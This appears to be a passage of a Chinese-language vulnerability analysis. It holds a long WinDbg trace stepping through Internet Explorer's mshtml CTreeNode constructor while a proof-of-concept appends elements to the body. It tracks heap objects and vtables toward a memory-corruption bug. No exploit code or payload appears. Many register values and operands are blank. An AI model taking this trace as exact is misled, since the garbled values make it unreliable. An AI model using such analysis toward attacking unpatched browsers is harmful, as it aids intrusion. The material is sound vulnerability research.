mshtml!CTreeNode::CTreeNode+0x8:
6a2bced8 c0e004 shl al,
:>
eax=127c7f00 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bcedb esp=0425e590 ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0xb:
6a2bcedb xor al,byte ptr [ecx+] ds::127c7fb9=
:>
eax=127c7f00 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bcede esp=0425e590 ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0xe:
6a2bcede push esi
:>
eax=127c7f00 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bcedf esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0xf:
6a2bcedf 8b7140 mov esi,dword ptr [ecx+40h] ds::127c7ff0=
:>
eax=127c7f00 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcee2 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x12:
6a2bcee2 and al,10h
:>
eax=127c7f00 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcee4 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x14:
6a2bcee4 xor byte ptr [ecx+],al ds::127c7fb9=
:>
eax=127c7f00 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcee7 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x17:
6a2bcee7 8a5109 mov dl,byte ptr [ecx+] ds::127c7fb9=
:>
eax=127c7f00 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bceea esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x1a:
6a2bceea b8ffffffff mov eax,0FFFFFFFFh
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bceef esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x1f:
6a2bceef 6689410a mov word ptr [ecx+0Ah],ax ds::127c7fba=
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcef3 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x23:
6a2bcef3 0bc0 or eax,eax
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcef5 esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x25:
6a2bcef5 83e607 and esi,
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcef8 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x28:
6a2bcef8 83ce08 or esi,
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcefb esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x2b:
6a2bcefb 6689410c mov word ptr [ecx+0Ch],ax ds::127c7fbc=
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bceff esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x2f:
6a2bceff 83c8ff or eax,0FFFFFFFFh
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf02 esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x32:
6a2bcf02 mov dword ptr [ecx+40h],esi ds::127c7ff0=
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf05 esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x35:
6a2bcf05 6689410e mov word ptr [ecx+0Eh],ax ds::127c7fbe=
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf09 esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x39:
6a2bcf09 mov dword ptr [ecx],edi ds::127c7fb0=
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf0b esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x3b:
6a2bcf0b 85ff test edi,edi
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf0d esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x3d:
6a2bcf0d je mshtml!CTreeNode::CTreeNode+0x45 (6a2bcf15) [br=]
:>
eax=ffffffff ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf0f esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x3f:
6a2bcf0f 8a4718 mov al,byte ptr [edi+18h] ds::1af02ff0=
:>
eax=ffffff60 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf12 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x42:
6a2bcf12 mov byte ptr [ecx+],al ds::127c7fb8=
:>
eax=ffffff60 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf15 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x45:
6a2bcf15 8b4508 mov eax,dword ptr [ebp+] ss::0425e598=15171fb0
:>
eax=15171fb0 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf18 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x48:
6a2bcf18 mov dword ptr [ecx+],eax ds::127c7fb4=
:>
eax=15171fb0 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf1b esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x4b:
6a2bcf1b 85ff test edi,edi
:>
eax=15171fb0 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf1d esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x4d:
6a2bcf1d 0f84f15deaff je mshtml!CTreeNode::CTreeNode+0x5a (6a162d14) [br=]
:>
eax=15171fb0 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf23 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x4f:
6a2bcf23 0fb64108 movzx eax,byte ptr [ecx+] ds::127c7fb8=
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf27 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x53:
6a2bcf27 e8cd020000 call mshtml!IsPreLikeTag (6a2bd1f9)
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf2c esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x5c:
6a2bcf2c 85c0 test eax,eax
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf2e esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x5e:
6a2bcf2e 0f95c0 setne al
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf31 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x61:
6a2bcf31 c0e003 shl al,
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf34 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x64:
6a2bcf34 32c2 xor al,dl
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf36 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x66:
6a2bcf36 and al,
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf38 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x68:
6a2bcf38 32c2 xor al,dl
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf3a esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x6a:
6a2bcf3a mov byte ptr [ecx+],al ds::127c7fb9=
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf3d esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x6d:
6a2bcf3d 85ff test edi,edi
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf3f esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x6f:
6a2bcf3f 0f84d65deaff je mshtml!CTreeNode::CTreeNode+0x7c (6a162d1b) [br=]
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf45 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x71:
6a2bcf45 0fb64108 movzx eax,byte ptr [ecx+] ds::127c7fb8=
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf49 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x75:
6a2bcf49 e8ab020000 call mshtml!IsPreLikeTag (6a2bd1f9)
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf4e esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x7e:
6a2bcf4e 33d2 xor edx,edx
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf50 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x80:
6a2bcf50 85c0 test eax,eax
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf52 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x82:
6a2bcf52 0f95c2 setne dl
:>
eax= ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf55 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x85:
6a2bcf55 8bc1 mov eax,ecx
:>
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf57 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x87:
6a2bcf57 33d6 xor edx,esi
:>
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf59 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x89:
6a2bcf59 83e201 and edx,
:>
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf5c esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x8c:
6a2bcf5c 33d6 xor edx,esi
:>
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf5e esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x8e:
6a2bcf5e mov dword ptr [ecx+40h],edx ds::127c7ff0=
:>
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi= edi=1af02fd8
eip=6a2bcf61 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x91:
6a2bcf61 5e pop esi
:>
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bcf62 esp=0425e590 ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x92:
6a2bcf62 5d pop ebp
:>
eax=127c7fb0 ebx= ecx=127c7fb0 edx= esi=0425e660 edi=1af02fd8
eip=6a2bcf63 esp=0425e594 ebp=0425e630 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x93:
6a2bcf63 c20800 ret
:> dd eax
127c7fb0 1af02fd8 15171fb0 ffff0060 ffffffff
127c7fc0
127c7fd0
127c7fe0
127c7ff0 d0d0d0d0
127c8000 ???????? ???????? ???????? ????????
127c8010 ???????? ???????? ???????? ????????
127c8020 ???????? ???????? ???????? ????????
:> dd 1af02fd8
1af02fd8 6a0f70e0
1af02fe8 071faee0
1af02ff8 18b1cfe8 ???????? ????????
1af03008 ???????? ???????? ???????? ????????
1af03018 ???????? ???????? ???????? ????????
1af03028 ???????? ???????? ???????? ????????
1af03038 ???????? ???????? ???????? ????????
1af03048 ???????? ???????? ???????? ????????
:> ln 6a0f70e0
(6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>

可见这个CTreeNode是属于CPhraseElement的,也就是说POC中的document.body.appendChild(id_0);这句话导致的结果是为Phrase对象创建了CTreeNode对象,那么这个CTreeNode连入谁了呢?根据js我们猜测是body对象

:> dd eax
127c7fb0 1af02fd8 15171fb0 ffff0060 ffffffff
127c7fc0
127c7fd0
127c7fe0
127c7ff0 d0d0d0d0
127c8000 ???????? ???????? ???????? ????????
127c8010 ???????? ???????? ???????? ????????
127c8020 ???????? ???????? ???????? ????????
:> dd 15171fb0
15171fb0 150e3fd0 1379cfb0
15171fc0 1515ffc0 15171fd8
15171fd0 1515ffd8 1976dfe0
15171fe0 1362afd8 13e48fe0 13e48fe0 1379cfd8
15171ff0 d0d0d0d0
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
:> dd 150e3fd0
150e3fd0 6a246670 07701fe8
150e3fe0 071fae80 15171fb0 8202e280
150e3ff0 104d4f00 d0d0d0d0
150e4000 ???????? ???????? ???????? ????????
150e4010 ???????? ???????? ???????? ????????
150e4020 ???????? ???????? ???????? ????????
150e4030 ???????? ???????? ???????? ????????
150e4040 ???????? ???????? ???????? ????????
:> ln 6a246670
(6a246670) mshtml!CBodyElement::`vftable' | (6a2a9108) mshtml!CCaret::`vftable'
Exact matches:
mshtml!CBodyElement::`vftable' = <no type information>

果然没错,就是body对象

:> r
eax= ebx=0425e960 ecx= edx= esi=0425e950 edi=0425e950
eip=6c77d711 esp=0425e834 ebp=0425e870 iopl= nv up ei pl nz ac po nc
cs=001b ss= ds= es= fs=003b gs= efl=
jscript!sin:
6c77d711 ff256810756c jmp dword ptr [jscript!_imp__sin (6c751068)] ds::6c751068={msvcrt!sin (773d8aea)}

成功撞上我们的辅助调试语句

:> g
Breakpoint hit
eax=06c3efd8 ebx=6a628b0c ecx=6a1f20c4 edx=0425e7f4 esi= edi=
eip=6a1f20c4 esp=0425e7c8 ebp=0425e7f8 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::appendChild:
6a1f20c4 8bff mov edi,edi

第二条appendChild导致的中断,按同样的方法调试

:> g
Breakpoint hit
eax=06c3efd8 ebx=6a628b0c ecx=6a1f20c4 edx=0425e7f4 esi= edi=
eip=6a1f20c4 esp=0425e7c8 ebp=0425e7f8 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::appendChild:
6a1f20c4 8bff mov edi,edi
:> g
Breakpoint hit
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
eip=6a2bced0 esp=0425e594 ebp=0425e630 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode:
6a2bced0 8bff mov edi,edi
:> p
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
eip=6a2bced2 esp=0425e594 ebp=0425e630 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x2:
6a2bced2 push ebp
:>
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
eip=6a2bced3 esp=0425e590 ebp=0425e630 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x3:
6a2bced3 8bec mov ebp,esp
:>
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
eip=6a2bced5 esp=0425e590 ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x5:
6a2bced5 8a450c mov al,byte ptr [ebp+0Ch] ss::0425e59c=
:>
eax=196e2f00 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
eip=6a2bced8 esp=0425e590 ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x8:
6a2bced8 c0e004 shl al,
:>
eax=196e2f00 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
eip=6a2bcedb esp=0425e590 ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0xb:
6a2bcedb xor al,byte ptr [ecx+] ds::196e2fb9=
:>
eax=196e2f00 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
eip=6a2bcede esp=0425e590 ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0xe:
6a2bcede push esi
:>
eax=196e2f00 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
eip=6a2bcedf esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0xf:
6a2bcedf 8b7140 mov esi,dword ptr [ecx+40h] ds::196e2ff0=
:>
eax=196e2f00 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcee2 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x12:
6a2bcee2 and al,10h
:>
eax=196e2f00 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcee4 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x14:
6a2bcee4 xor byte ptr [ecx+],al ds::196e2fb9=
:>
eax=196e2f00 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcee7 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x17:
6a2bcee7 8a5109 mov dl,byte ptr [ecx+] ds::196e2fb9=
:>
eax=196e2f00 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bceea esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x1a:
6a2bceea b8ffffffff mov eax,0FFFFFFFFh
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bceef esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x1f:
6a2bceef 6689410a mov word ptr [ecx+0Ah],ax ds::196e2fba=
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcef3 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x23:
6a2bcef3 0bc0 or eax,eax
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcef5 esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x25:
6a2bcef5 83e607 and esi,
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcef8 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x28:
6a2bcef8 83ce08 or esi,
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcefb esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x2b:
6a2bcefb 6689410c mov word ptr [ecx+0Ch],ax ds::196e2fbc=
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bceff esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x2f:
6a2bceff 83c8ff or eax,0FFFFFFFFh
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf02 esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x32:
6a2bcf02 mov dword ptr [ecx+40h],esi ds::196e2ff0=
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf05 esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x35:
6a2bcf05 6689410e mov word ptr [ecx+0Eh],ax ds::196e2fbe=
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf09 esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x39:
6a2bcf09 mov dword ptr [ecx],edi ds::196e2fb0=
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf0b esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x3b:
6a2bcf0b 85ff test edi,edi
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf0d esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x3d:
6a2bcf0d je mshtml!CTreeNode::CTreeNode+0x45 (6a2bcf15) [br=]
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf0f esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x3f:
6a2bcf0f 8a4718 mov al,byte ptr [edi+18h] ds::07824fe0=
:>
eax=ffffff75 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf12 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x42:
6a2bcf12 mov byte ptr [ecx+],al ds::196e2fb8=
:>
eax=ffffff75 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf15 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x45:
6a2bcf15 8b4508 mov eax,dword ptr [ebp+] ss::0425e598=15171fb0
:>
eax=15171fb0 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf18 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x48:
6a2bcf18 mov dword ptr [ecx+],eax ds::196e2fb4=
:>
eax=15171fb0 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf1b esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x4b:
6a2bcf1b 85ff test edi,edi
:>
eax=15171fb0 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf1d esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x4d:
6a2bcf1d 0f84f15deaff je mshtml!CTreeNode::CTreeNode+0x5a (6a162d14) [br=]
:>
eax=15171fb0 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf23 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x4f:
6a2bcf23 0fb64108 movzx eax,byte ptr [ecx+] ds::196e2fb8=
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf27 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x53:
6a2bcf27 e8cd020000 call mshtml!IsPreLikeTag (6a2bd1f9)
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf2c esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
